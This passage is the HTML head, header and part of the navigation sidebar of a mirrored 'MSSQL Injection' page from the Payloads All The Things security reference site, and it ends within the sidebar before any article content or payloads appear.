weyne/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/weyne85/PayloadsAllTheThings.git synced 2025-10-29 16:57:02 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
76f281cc930ba9049164f4e57bc50400bb693af1
PayloadsAllTheThings/SQL Injection/MSSQL Injection/index.html

6509 lines
179 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MSSQL%20Injection/">
<link rel="prev" href="../HQL%20Injection/">
<link rel="next" href="../MySQL%20Injection/">
<link rel="icon" href="../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.5.15">
<title>MSSQL Injection - Payloads All The Things</title>
<link rel="stylesheet" href="../../assets/stylesheets/main.7e359304.min.css">
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../custom.css">
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#mssql-injection" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../.." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
MSSQL Injection
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12c0-2.42-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
</form>
<script>var media,input,key,value,palette=__md_get("__palette");if(palette&&palette.color){"(prefers-color-scheme)"===palette.color.media&&(media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']"),palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent"));for([key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
</button>
</nav>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../.." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../.." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key Leaks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
AWS Amazon Bucket S3
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
AWS Amazon Bucket S3
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../AWS%20Amazon%20Bucket%20S3/" class="md-nav__link">
<span class="md-ellipsis">
Amazon Bucket S3 AWS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Argument Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Argument Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Argument%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Argument Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CICD
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CICD
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CICD/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
CSRF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
CSRF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CSRF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking: Web Application Security Vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Dom Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Dom Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Dom%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
Dom Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
